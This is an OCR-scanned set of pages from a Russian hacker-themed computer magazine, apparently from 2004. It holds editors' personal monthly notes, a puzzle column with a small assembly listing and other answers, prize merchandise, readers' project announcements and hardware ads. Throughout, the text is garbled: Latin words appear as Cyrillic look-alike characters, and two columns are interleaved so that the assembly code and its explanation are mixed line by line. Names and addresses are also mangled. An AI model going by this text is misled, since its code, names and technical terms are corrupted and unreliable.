практически всегда показывает на 
один и тот же сектор: «продавай». 



Или судьба мне такая предначертана. 
Какой вопрос ни задам, ответ один - 
продавай. Спрашиваю: «Какую об- 
ложку на следующий номер ставить, 
снова сексуальную или нет»? - «Про- 
давай». «Стоит ли увеличивать 
РС 2опе?» - «Продавай». «Сколько 
платить выпускающему редактору?» - 
«Продавай». Ни хрена не легче от это- 
го шарика, одним словом. 

Вот я своей подружке правильный по- 
дарок сделал - кухонный передник с 
изображением голой женщины. ИМ- 
ХО, то что нужно для поднятия тонуса. 




СЕРГЕЙ ПОКРОВСКИЙ (8ІЯТЕ2) 



9 же год как увлекаюсь цифровой 
обработкой видео. В ноябре 
наконец-то подарил себе на день 
рождения видеокамеру. В этом ме- 
сяце снял всю команду, монтирую, 
обрабатываю, и в итоге получится 
ролик, который ты сможешь уви- 
деть при старте каждого приатта- 
ченного к журналу диска в 
следующем выпуске X. Что-то сов- 
сем не читал художественной лите- 
ратуры в этом месяце, одни бизнес- 
книги. Зато посмотрел прикольный 
фильм "Влюбленный Тома", о чува- 
ке, который боится выходить из до- 
му и общается с народом через ви- 
деофон, ну а временами удовлетво- 
ряется киберсексом. Очень понра- 
вилась операторская работа в этом 
фильме, напомнило "Амели”. Так же 
вытянута вверх контрастность и на- 
сыщенность цвета, преобладают 
чистые и кислотные цвета. И нако- 
нец-то выбрался на Горбушку. Зата- 
рился последним альбомом Тбе 
Сгузіаі Меібоб - бедіоп оі Воот, ку- 
пил их же альбом ремиксов 




Соттипііу Зегѵісе, а также послед- 
ний альбом Е-2 ПоІІегз - УскаЫе 
Веаіз. Очень хорошие пластинки, 
уже третий день только их и слушаю 
:). А вот АппиаІ за осень 2003 года 
от лейбла Міпізігу оі Зоипб абсо- 
лютно не вставил, как-то совсем не 
позитивно, грузово, что редко услы- 
шишь в Хаус музыке. 




С пешу доложить вам, разлюбезная моя Катерина Матвеевна, что жизнь 
у меня в целом неплоха. После того как в нашу пустыню завезли элект- 
ронно-вычислительную машину, ее даже можно назвать счастливой. Теперь 
я не обращаю внимания на гарем и не назначаю любимых жен - я редакти- 
рую Кодинг местного журнала Хакер, целыми днями загорая под нежарким 
солнцем ЮР-монитора. Это очень увлекательно и так похоже на профессию 
простого русского пехотинца. Вы, должно быть, подумаете, что у меня 
компьютерная зависимость? Ничуть не бывало. Я в любой момент могу во- 
обще завязать с компьютером... 



КН01 



Н а днях приобрел ІМАС 20”. Теперь сижу по ночам и колдую над ним... Оказалось, не 
так уж легко найти халявный софт и игрушки под систему МАО ОЗ X 10.3. Ни в од- 
ном из книжных Москвы не оказалось в наличии литературы о системе МАО ОС. Нет, 
вру, одну нашел, совершенно никчемную, слава богу, на МАС’е приходилось работать 
не раз, так что обойдемся без книг. Ждать софт придется целую неделю. Но пока не те- 
ряю времени зря, по чуть-чуть юзаю систему, жму пятерней на однокнопочную мышь. 
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З имой в Питере не слишком весело, да 
и работы в этом месяце хватало, так 
что из дому я выбирался редко. Нормаль- 
но отдохнуть удалось лишь раз, когда ко 
мне приехал старый друг, и мы отправи- 
лись в ближайший клуб поиграть в боу- 
линг. Кстати, та игра запомнилась. В од- 
ной партии мне удалось сделать шесть 
страйков, причем четыре страйка шли у 
меня один за другим, за что нам от адми- 
нистрации было организовано бесплатное 
пиво. Самое смешное же заключалось в 
том, что подобная меткость мне совер- 
шенно не свойственна - обычно я с тру- 
дом набираю сто очков за игру. Но в тот 
день мне так везло, что под конец я уже 
начал подкалывать приятеля и говорить о 
себе не иначе как «мы, профессионалы»... 
Разобравшись с делами, пошел и купил 
себе контроллер ІЕЕЕ-1394. Давно хотел 
это сделать. Камерой формата Міпі ЭѴ я 
обзавелся еще в прошлом году и с тех 
пор уже успел отснять пару десятков 
шестидесятиминутных видеокассет. Ка- 
мера к компьютеру подключилась без ка- 
ких бы то ни было проблем. Качество 
«домашнего видео» сильно порадовало, а 
вот над своими операторскими навыками 
я решил еще поработать. Тем не менее, 
пару кассет на винчестер я все-таки пе- 
реписал, и все свободное время посвя- 
тил редактированию и подготовке к запи- 
си на Р\Я) видеовоспоминаний о своем 
последнем отпуске. Готовый диск у дру- 
зей и родственников получил высокую 
оценку. На все похвалы я небрежно пожи- 
мал плечами, всем своим видом привыч- 
но показывая, что нам, профессионалам, 
и не такое по плечу :). 





Э тот месяц оказался крайне перегру- 
жен всякими событиями и пережива- 
ниями. Первое и самое главное, я стал 
выпускающим редактором. Работы сразу 
стало на порядок больше. А если точнее, 
то началось просто МЯСО. Следить за 
всеми редакторами, проверять сданные 
материалы, корректировать оформление, 
текст. Пинать их, если они что-то задер- 
живают, проводить урологические масса- 
жи. В общем, много новых радостей. 
Второе - отношения в семье. Приходишь 
к выводу, что чем больше хочешь незави- 
симости, тем больше получаешь проб- 
лем, т.к. все равно приходится продол- 
жать жить по правилам родителей. Поэ- 
тому, чтобы уместить все свои жизнен- 
ные взгляды и внутреннее разгильдяй- 
ство в одном месте, возникает необходи- 
мость снимать отдельную квартиру. Так 
что голова теперь работает в этом нап- 
равлении. 

Из приятных моментов - стал еще боль- 
ше читать. Теперь я практически не рас- 
стаюсь с книгами. Если появляется сво- 
бодное время, то его я провожу с ними 
любимыми (хотя, конечно, с девушкой 
еще лучше). Осилил совсем недавно Ке- 
на Кизи «Песня моряка». Перешел к Уиль- 
яму Берроузу «Голый завтрак». 

Из музыки несколько зациклился на бэкг- 
раундных композициях и диске Рзу-Е- 
Тегпііу «А ЗшооІІт Ооигпеу Іпіо Рзу- 
Тгапсе». Очень уж понравился этот сбор- 
ник. А порой хочется вернуться к мясно- 
му Ошт’п’Вазз или Тесбзіер и колба- 
ситься под это на танцполе. 



А 



, 



И не наконец-то удалось полноценно 
отдохнуть - после сдачи сессии и 
номера я с друзьями ломанулся на неде- 
лю в пансионат. Самое смешное, что пу- 
тевки туда удалось вымутить на халяву, 
от какой-то там общественной организа- 
ции. Надо сказать, что халява не всегда 
бывает полным отстоем: в заведении 
«Лисицкий Бор» под Тверью, где мне уда- 
лось побывать, все было достаточно 
сносно. Были там снегоходы, баня, ката- 
ние на конях, дискотеки (пердяевские, 
конечно), много позитивного народа, 
знакомств, смеха, бреда, пьянок-гулянок, 
разломанных номеров и прочего к этому 
прилагающегося. 

По приезду на Родину я внезапно узнал, 
что стал редактором Юнитов, и что через 
три дня их надо сдать. Сразу после отды- 
ха все началось сначала... Но по любому, 
мне нравится такая жизнь! ;) 





В этом месяце меня потянуло на кули- 
нарные подвиги. Может, подейство- 
вало общение с Холодом - постоянные 
разговоры о том, какой он испек торт и 
сколько корицы надо класть в глинтвейн, 
у любой девушки сформируют комплекс 
неполноценности. В общем, после того 
как я приготовила курицу в соусе из ана- 
насов и апельсинов, мой друг, кажется, 
всерьез задумался о том, что в семейной 
жизни есть свои преимущества. Он, 
правда, еще не знает, что тяга к экспери- 
ментам у меня появляется нечасто - ну, 
может, раз в полгода :). Хотя, как оказа- 
лось, мне нравится готовить - главное, 
подходить к процессу творчески, не 
превращая его в рутину. Впрочем, это от- 
носится к любому делу, верно? 




М есяц начался просто отвратительно: Огіауз сплойты не компилились, статьи не писались, 
обжимной инструмент валился из рук, да еще прямо перед моим днем рождения подру- 
га преподнесла отличный подарок: сменила свой статус на ех-дігІГгіепб. Так дальше продол- 
жаться не могло, и я решил устроить себе праздник души: купил ноут Сотрац Еѵо N6200 
(спонсоры, где же вы, где?). Возможно, кто-то скажет, взглянув на спецификацию, что если 
сейчас в новом буке нет вайрес лан и блютуса, то это полный слив. Не знаю, меня эта мо- 
дель полностью устраивает, хотя неплохо было бы винт пошустрее, памяти побольше... 
Ну, ты меня понимаешь ;-). 
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I Иван Скляров С8кІуагоѵ@геаІ.хакер.ги) 



ІІІЧІН ■ ІІІІІИІ 



Х-РІІ221Е 



«ПРОЙДИСЬ ДЕБПГГЕРОИ ПО СВОИМ МОЗГПМ!» 

Не стесняйся присылать мне свои ответы, даже если ты смог ответить всего на 
один пазл, я с интересом почитаю твои оригинальные решения. Ну, а имена 
героев, которые первыми правильно ответят на все вопросы, конечно же, будут 
опубликованы в журнале, чем прославятся на всю Россию (и не только] и 
навечно войдут в историю Н. Приз за нами не заржавеет ;). 

Но помни: в большинстве случаев вариант ответа засчитывается как 
правильный, только если к нему приложено подробное и ВЕРНОЕ 
объяснение, почему выбран именно этот вариант, а не какой-либо другой. 



ІІІПІІІІ ІІІІІИІ 



ПЕРВЫЙ ППЗП «ДПЯ СПМЫК МППЕНЬКИК» 




Правильные ответы читай в следующем номере. 
Если хочешь получить приз, присылай свои ответы 
до 1 апреля. До встречи! 
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ОТВЕТЫ К ПРЕДЫДУЩЕМУ ВЫПУСКУ К-РІІШЕ 


■ ОТВЕТ НА ПАЗЛ №1 


геі 


«ХИТРЫЙ БАЙТИК» 


Ргосебигеі епбр 




Ргосебиге2 ргос 


Задача проста для тех, кто хоть нем- 


тоѵ аб, 9 


ного умеет работать с отладчиком. 


тоѵ бх, оіізеі Меззаде 


Нужно исправить десятый байт 41 6 на 


іпі 216 


596, т.е. изменить команду "іпс сх" на 


геі 


"рор сх" (естественно, это может быть 


Ргосебиге2 епбр 


не единственный вариант). Вот изна- 


СЗЕС епбз 


чальная сот-программа на ассембле- 


епб Ведіп 


ре (МАЗМ): 




С5ЕО зедтепі 


■ ОТВЕТ НА ПАЗЛ №2 


а 5 з и т е 


«ИНОПЛАНЕТНЫЙ КАЛЬКУЛЯТОР» 


С8:С5ЕС, 05:05 ЕО,Е5:С5 ЕС, 55:С5Е0 




огд 1006 


Ответ будет следующим: 2+3=1 1 . 




Калькулятор считает в четверичной 


Ведіп: 


системе счисления, т. е. все числа 


тоѵ сх,3 


представлены только четырьмя циф- 


ІлЬеІІ: 


рами: 0, 1 , 2, 3 (1 1 в четверичной сис- 


саІІ Ргосесіигеі 


теме соответствует 5 в бес). 


Іоор І_аЬеІ1 




ризб ах 




іпс сх; эту команду нужно исправить 


■ ОТВЕТ НА ПАЗЛ №3 


на рор сх 


«БРЕДОГЕНЕРАТОР» 


іпс сх 




іпссх 


Начало последовательности будет та- 


І_аЬе!2: 


ким: 01123. Данная последователь- 


саІІ Ргосебиге2 


ность образована числами Фиббоначи 


Іоор І_аЬеІ2 


(каждое последующее число этой пос- 


іпі 206 


ледовательности образуется суммой 


Меззаде 6Ь "СооІ 


двух предыдущих), записанными без 


Наскег!",0О6,0А6,Т 


пробелов, т.е. 0 1 1 2 3 5 8 13 21 34 


Ргосесіигеі ргос 


55 89 144 233... 


абб ах, 1 





ВТОРОЙ ППЗП «КПК ЖЕ ЗТО РПСШИФРОВЫВПЕТСЯ?» 



Расшифровать: 

<кЬу, ідгпт г рТ,зк діМгк.хЬпт НТсгкТІге гШЬГпеМз 



ТРЕТИЙ ППЗП «КОДЕРСКПЯ зпдпчкп» 



Составить программу, которая решала бы уравнение ви- 
да: 5=х/16, где х - задается пользователем. Единствен- 
ное условие - в коде нельзя использовать цифры (кроме 
нуля) и знаки: *, /, \, +. Писать можно на любом языке 

программирования, кроме низкоуровневых (ассемблера), 
также в программе нельзя использовать ассемблерные 
вставки. Мой вариант будет на Сях. 





1 


приз 


т 


1 ЯІ 






— 




На прошлый выпуск Х-Риіііе пришли ответы от 74999 чита- 
телей... только один пАдонок схалявил. Блин, так это же я 
был! Короче, решил я сделать все по-честному, можно да- 
же сказать по понятиям, а именно отобрать через рандом 
трех победителей. 

Итак, первый приз уходит к Еіііаіі Оетіп (гап(1іг@Ііо№ох.гіі). 
Наши аплодисменты по клавишам! 
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ЧЕТВЕРТЫЙ ППЗП «ПУТИ В ХПКЕРСТВО» 



3 приз 



Толстовка "ѴѴѴШ - Ше ѴѴапІ Шошеп" 
с логотипом "Хакер" темно-синяя 



Элитный коврик Хакер ѴѴЕЮОМЕ 
и годовая подписка на журнал 
Хакер 



* - у.е. = убитые еноты 



ЕРСТІО 
Р С т В О 

т во 

ІРСІВО 
РСТ во 
ство 
т в о 
во 
о 



е-зИор 



НМр://ѵѵѵѵѵѵ.е-8Ьор.ги 






УЛИЦА _ 
ФИО 



Сколькими способами, продвигаясь от буквы к букве, можно прочитать слово ХА- 
КЕРСТВО? На рисунке красной линией показан пример маршрута. 

Кто составит программу, которая перебором подсчитает все возможные пути, по- 
лучит дополнительный кусочек сахара. 



Зажигалка металлическая с 
гравировкой с логотипом журнала 
"Хакер" 



днаы—н 



ѵѵѵѵѵѵ.е-зИор.ги 

ТОВАРІ 
В СТИЛІ 



СІйЛЕ 



ѵѵѵѵѵѵ. датерозЕ. ги 



1 — 




ш> л 1 
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*4 
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■ 


_ .і 


і 






Пивная кружка 
со шкалой 

с ЛОГОТИПОМ 

"Хакер" 



лзЭ 9 



Коврик для мыши "Опасно для жизни" 
с логотипом журнала "Хакер" 
(черный) 





Футболка "Хакер Іпзійе" 
с логотипом "Хакер", красная 



Футболка с логотипом Хакер 
темно-синяя, черная 



Стильная футболка НАСК ОРР и годовая 
подписка на журнал Хакер 



Второй приз забирает Первухин Денис 
(20где@бо1Ьох.ш). Денис попросил напи- 
сать, что его «идейно вдохновляла Тананы- 
кина Оксана ака Акзуа». Я выполнил его 
просьбу. Однако нехорошо утаивать адрес 
идейной вдохновительницы от обществен- 
ности, как-то это не по-нашему - не по- 
пацански. Работникам Хакера, например, 
идейные вдохновительницы страсть как 
нужны! Надеюсь только, Оксана не похожа 
на девушку из эротических фантазий Кут- 
тера, ы? Извините, я выйду на минутку, 
что-то мне опять нехорошо стало... 



Третий приз уносит Веч- 
но Голодный Студент Ис- 
ламов Эдуард 
(шкеКэЧгопІ.гц). Тут мое 
суровое сердце не выдер- 
жало, скупая мужская сле- 
за упала на клавишу 
Епіег... Просто вспомнил 
свои студенческие годы. 
Эдуард пишет, что его фа- 
милия к религии не имеет 
никакого отношения. Не 
надо этого стесняться, 
Эдуард, у тебя хорошая 
фамилия, и религия хоро- 
шая, если ее исповедуют 
хорошие люди... 






Футболка "Думаю" с логотипом 
"Хакер" белая 



е-зНор 



САМЕРОЗТ 



ИГРЫ ПО КПТШ10ГПМ с достпвкой ни дом 



ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-5НОР 











ІТЫ 






/ НПКЕР/№03(БЗ)/2004 



I Ведущий рубрики СІапе (сіапеігеаі.хакерли) 




Если ты хочешь собрать команду единомышленников для 
создания какого-либо проекта, и другого способа донести это до 
общественности у тебя нет, присыпай нам свои объявы. 

Принимается все: проекты для кодеров, веб-дизайнеров и 
простых людей, заинтересованных в совместном творчестве. 
Если Хпроект дойдет до стадии завершения, он обязательно 
попадет на эту страницу, а его авторы получат приз. Объявления 
о стартующих и рассказы о завершенных проектах присыпай на 
Ьоа«ІігеаІ.хакер.ги. Удачи! 






Паскаписты! Проснитесь от затяжного сна! Настало наше время! 
Моя идея не нова, но все же я на 100% готов к созданию самого ин- 
формативного портала по программированию наТигЬо РазсаІ . Домен 
для проекта будет 2 уровня. На сайте планируются следующие раз- 
делы: новости, обучение, исходники, боѵѵпіоаб, статьи, книги, фо- 
рум. Для процветания проекта ему нужно огромное количество по- 
лезного материала, который я предлагаю присылать на ргодгат- 
тег 2 @паго 6 .ги. Если у вас пылится на жестком диске интересная 
статья, полезные исходники или редкая книга, то прошу, не полени- 
тесь прислать все это на указанный выше е-таіі. Заранее огромное 
спасибо! 




Всем привет! Наверняка все читатели ][ в курсе, что представляют 
собой видеоуроки. Для тех, кто в танке, объясняю - это в основном 
тред файлы плохонького качества с неразборчивыми надписями и 
т.д. и т.п. (Речь идет не о наших уроках по взлому, а о других, совко- 
вых :) - прим, редактора.) Моя задумка состоит в том, чтобы напи- 
сать программу, которая будет записывать перемещения курсора 
преподавателя по рабочему столу с соответствующими голосовыми 
комментариями. Она же при установке на компьютер клиента (учени- 
ка) будет повторять все действия препода. Как вам? Я сам в прог- 
раммировании имею поверхностные знания, поэтому мне нужен че- 
ловек, способный все это закодить. Я же занимаюсь написанием 
уроков по 36$ шах, Ріюіозіюр, СогеІ. Думаю, такая программа будет 
полезна, так как при должной продуманности будет иметь колоссаль- 
ные преимущества перед остальными. Координаты для связи: е-таіі: 
(оі$кіІі_ѵіі@Іі 5 і.ги, ісд: 46165957. 




Проект "Сделай игру своими руками" создан для того, чтобы объ- 
единить людей, которые хотят создавать компьютерные игры 
собственными руками. В проекте может участвовать каждый желаю- 
щий, который может либо реально помочь проекту, либо имеет базо- 
вые знания в какой-либо области разработки и хочет научиться иску- 
сству "игроделия". На сегодняшний день над первым проектом в по- 
те лица трудятся четыре человека: два программиста (они же ЗО-мо- 
деллеры по совместительству), еще один Зй-моделлер и человек, 
который полностью занят звуковым наполнением игры. В данный мо- 
мент разработан каркас графического движка, состоящий из: 

О инициализации настроек видеокарты пользователя; 

О начального меню; 

© трехмерного мира, в котором катастрофически не хватает 30 
объектов; 

О возможности загрузки трехмерных объектов в сцену игры; 

О персонажа, который может в этом мире путешествовать, куда 
ему вздумается. 




Разумеется, игра имеет оригинальный сюжет. Кстати, это 30 бро- 
дилка-стрелялка. Проект остро нуждается в свежей крови, особенно 
в программистах на ѴізиаІ С++. Сразу предупреждаю, что проект не- 
коммерческий. Если есть желание помочь, а заодно и приобрести 
бесценный опыт, прошу писать на таіііо: $дт@рос!і 1 а.ги. 




Привет, перцы! Я буду неоригинален, но мне пришла в голову от- 
личная идея создать свою игру. Это будет онлайновая ѵѵіп32 АЗСІІ 
грд'шка. Удивлены? Хотите поучаствовать в разработке? Тогда смело 
пишите на мой е-таіі: 1 іагбпеѵѵ$@ІІ$ 1 .ги. 




Пива всем! Гулял по просторам необъятной Сети, и мне в голову 
пришла отличная идея, которой я готов поделиться. Я хочу сделать 
30-станок. Удивлены? Ошарашены? Не пугайтесь, сейчас все объяс- 
ню =). Я беру на себя аппаратную часть станка - направляющие, ша- 
говые двигатели, шарико-винтовые пары, рабочая каретка еіс. Чудо 
будет с рабочим полем 2 x 2 x 2 метра, точность по механике до 0,01 
мм. Рабочий инструмент будет перемещаться во всех_ плоскостях. 
Вот что требуется сделать моим помощникам в первую очередь: 

- требуется для начала на анси-С написать движок с линейной и 
круговой интерполяцией, причем в Зй. Необходимо будет учесть 
множество параметров, например коррекция на размер инструмен- 
та, на углы подхода к заготовке еіс. На АИЗІ нужно писать лишь по- 
тому, что он будет встроен в микроконтроллер и должен работать в 
реалтайме. 

- в параллель нужно писать пользовательский интерфейс - импорт 
.36$ .тах .бѵѵд, визуализация, задача множества параметров обра- 
ботки, формирование управляющей программы, работа со станком 
через гз-232. 

Система команд имеет место быть, возьмем за основу стандарт 
ЧПУ от Сименс, ТЗ напишем сообща, сайт под это дело организуем 
в момент. Проект коммерческий, так что участников не забудем =). 
Жду писем на мой е-таіі: те@бі$си$.ги. 
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@ Ь6 рьлхггом / г 
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Відііаііу доиг$ 




1 ► ^ 

И все-таки он вертится! 



о° 



Ѵі 



та ѵісіогіа 

( 095 ) 288 - 6130 , 288-6117 



Р=ЬЛТГ*ОІЧГ Р 7 СШР 

Абсолютно плоский экран 
Размер точки 0,24 мм 
Частота развертки 95 кГ ц 
Экранное разрешение 1600x1200 
ІІЗВ-интерфейс 




г.Москва: Атлантик Компьютере (095) 240-2097; Банкос (095) 128-9022; Березка (095) 362-7840; ДЕЛ (095) 250-5536; Инкотрейд (095) 176-2873; Инфорсер (095) 747-3178 
КИТ-компьютер (095) 777-6655; Компьютеры и офис (095) 918-1117; Компьютерный салон ЗМ8 (095) 956-1225; ЛИНК и К (095) 784-6618; НИКС (095) 974-3333 
Сетевая Лаборатория (095) 784-6490; СКИД (095) 956-8426; Техмаркет Компьютере (095) 363-9333; Ф-Центр (095) 472-6401 ; РІаке (095) 236-9925; ІЗМ Сотриіегз (095) 319-81 75 
ОЮІ (095) 105-0700; РОБАРІЗ (095) 755-5557; Я-ЗІуІе (095) 904-1001; г.Архангельск: Северная Корона (8182) 653-525; г.Волгоград: Техком (8442) 975-937 
г.Воронеж: Сани (0732) 733-222, 742-148; г.Иркутск: Комтек (3952) 258-338; г. Липецк: Регард-тур (0742) 485-285; г.Тюмень: ИНЭКС-Техника (3452) 390-036. 










Генеральный «іаренер 
опиыпийсчдго комитета России 



Сумма технологий 
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Затеилд XI О, 

Размер меньше, возможности больше! 

Мобильная те*нші0гия Іпіеі Сепіило 1 ^ и щі^лне пудовые івдншюгни нашли 
«ас воплощение в 2 ахьип:і XI 0 . Это ноутбук нового по юг-тин идеально 
сочетающий ийшйчитшіьнуп ыйбндьнпсть. и вьнЗіЖуи гпсшврдитепьяопь 
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